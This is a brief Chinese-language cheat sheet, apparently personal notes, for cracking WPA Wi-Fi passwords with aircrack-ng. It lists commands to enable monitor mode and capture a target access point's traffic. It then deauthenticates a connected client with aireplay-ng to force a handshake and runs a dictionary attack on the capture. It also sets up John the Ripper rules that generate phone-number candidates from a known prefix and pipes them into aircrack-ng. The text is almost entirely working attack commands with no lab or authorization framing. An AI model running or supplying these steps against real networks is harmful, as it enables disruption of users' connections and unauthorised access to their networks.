- 把网卡设置成monitor模式
airmon-ng start wlan0
- 关闭可能影响的进程
airmon-ng check kill
- 开始抓包
airodump-ng wlan0
- 找到需要的ap,单一抓
#切换信道
airmon-ng start wlan0 1
#开始抓包
airodump-ng wlan0 -c 1 --bssid 20:AB:48:57:B7:D0 -w mywap
#打断client与ap的连接触发握手信息
aireplay-ng -0 1 -a 20:AB:48:57:B7:D0 -c D2:23:65:35:09:1D wlan0
- 找一个密码字典开始破解 -w 指定密码字典
aircrack-ng -w /usr/share/john/password.lst mywap-02.cap
工具
JTR(john the ripper)
基于规则动态生成字典,不占用空间
基于给定的手机号前7位生成后四位
找到手机号码段
vim haoma.txt
编辑配置文件
vim /etc/john/john.conf
#自动生成后四位号码
[List.Rules:Wordlist]
$[0-9]$[0-9]$[0-9]$[0-9]
生成
john --wordlist=haoma.txt --rules --stdout
使用
john --wordlist=haoma.txt --rules --stdout | aircrack-ng -e wifiname -w - package.cap